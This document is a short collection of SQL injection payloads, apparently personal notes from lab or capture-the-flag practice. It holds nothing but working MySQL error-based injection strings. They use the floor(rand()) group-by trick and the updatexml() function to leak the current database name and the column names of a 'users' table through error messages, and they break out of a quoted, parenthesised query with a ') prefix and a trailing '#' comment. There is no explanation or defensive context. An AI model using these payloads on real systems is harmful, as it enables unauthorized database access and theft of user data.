 select count(*),(concat(0x3a,(select database()),0x3a,(floor(rand()*2)))) as c from information_schema.tables group by c ;




') UNION select count(100),(concat(0x3a,(select group_concat(COLUMN_NAME) FROM information_schema.COLUMNS  WHERE TABLE_NAME = 'users'),0x3a,(floor(rand()*2)))) as c from information_schema.tables group by c ; #

') UNION  select count(*),(concat(0x3a,(select database()),0x3a,(floor(rand()*2)))) as c from information_schema.tables group by c ; #







#Another Method 
') AND  updatexml(0x3a,concat(0x3a,(select database()),0x3a),0x3a) ; #



') AND  updatexml(0x3a,concat(0x3a,(select group_concat(COLUMN_NAME) FROM information_schema.COLUMNS  WHERE TABLE_NAME = 'users'),0x3a),0x3a) ; #
